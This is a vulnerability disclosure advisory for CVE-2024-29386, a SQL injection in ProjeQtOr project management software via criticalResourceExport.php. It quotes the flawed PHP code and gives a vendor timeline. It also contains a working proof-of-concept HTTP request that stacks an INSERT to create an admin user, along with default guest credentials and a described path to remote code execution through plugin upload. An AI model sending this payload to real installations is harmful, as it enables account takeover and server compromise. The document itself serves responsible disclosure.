CVE-2024-29386

2024-04-04

Advisory

Software brief introduction

ProjeQtOr is an Open Source project management software.

https://en.wikipedia.org/wiki/ProjeQtOr
https://www.projeqtor.org/en/product-en/downloads

Vulnerability description

Projeqtor up to v11.2.0 was discovered to contain a SQL injection vulnerability via the component /view/criticalResourceExport.php. Exploitation of this flow leads to privilege escalation by adding new user with known credentials and admin role and Remote code execution via plugin upload.

Issue

model/Affectable.php

...
class  Affectable  extends  SqlElement {
...
public  static  function  tranformPlanningResult($scale, $start, $end) {
...
$resourceTeamAffection = array();
$resourceTeamAffRate=array();
$idResourceTeam=array();
$planWork=new  PlannedWork();
$tmpAss=new  Assignment();
$critPlannedWork="idProject not in ".Project::getAdminitrativeProjectList(false);
$critPlannedWork.=" and workDate>='$start' and workDate<='$end'";
$lstPlanWork=$planWork->getSqlElementsFromCriteria(null, false, $critPlannedWork,null,null,true);
$loop['ideal']=array("real"=>$arrayRealWork, "planned"=>$arrayPlannedWork);
$loop['real']=array("real"=>$arrayRealWork, "planned"=>$lstPlanWork); // PBER : Not sure, possibly to remove back to "real"=>array()
...

view/CriticalResourceExport.php

...
$scale = RequestHandler::getValue('scaleCriticalResources');
$start = RequestHandler::getDatetime('startDateCriticalResources');
$end = RequestHandler::getDatetime('endDateCriticalResources');
$idProject = RequestHandler::getId('idProjectCriticalResources');
$limitedRow = RequestHandler::getNumeric('nbCriticalResourcesValue');
Affectable::getCriticalResourcePlanningResult();
Affectable::drawCriticalProjectResourceList($scale, $start, $end, $idProject, $limitedRow);
...

Steps to reproduce

Login with guest:guest
Send GET request to the path /view/criticalResourceExport.php?scaleCriticalResources=a&startDateCriticalResources= Injection_Here &endDateCriticalResources=Injection_Here

Proof of concept

## SQLi to create new user with admin Priv
## After connecting to new admin acc, we upload a new plugin containing RCE php shell

GET /view/criticalResourceExport.php?scaleCriticalResources=a&startDateCriticalResources=2023-02-01&endDateCriticalResources=2023-03-01'+%3b+insert+into+resource+values("4","lol",NULL,NULL,NULL,"5f4dcc3b5aa765d61d8327deb882cf99",1,0,1,0,0,NULL,NULL,NULL,NULL,1.00000,NULL,0,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,"md5",1,NULL,"2024-02-09","ab041450606933a7f4491fdc9bb9e2fd",0,NULL,NULL,NULL,NULL,0,0,0,NULL,NULL,0,0,NULL,NULL,0)+%3b+--+'%3b&idProjectCriticalResources=1&nbCriticalResourcesValue=1 HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/main.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=9p222uq7m4r7fvlurlpdo62s5i
If-Modified-Since: Sun, 11 Feb 2024 13:38:47 GMT
Connection: close

Timeline (DD-MM-YYYY)

10-01-2024: Vulnerability identified
14-02-2024: 1st vendor contact attempt via email
05-03-2024: 2nd vendor contact attempt via email
10-03-2024: 3rd vendor contact attempt via website forum
12-03-2024: CVE requested
24-03-2024: CVE assigned
04-04-2024: CVE request publication

Conclusion

I discovered the issue during my journey at Mazars Cybersecurity as an application security consultant. The product owner was notified following their security policy via an email and public forum of the website but didn’t respond.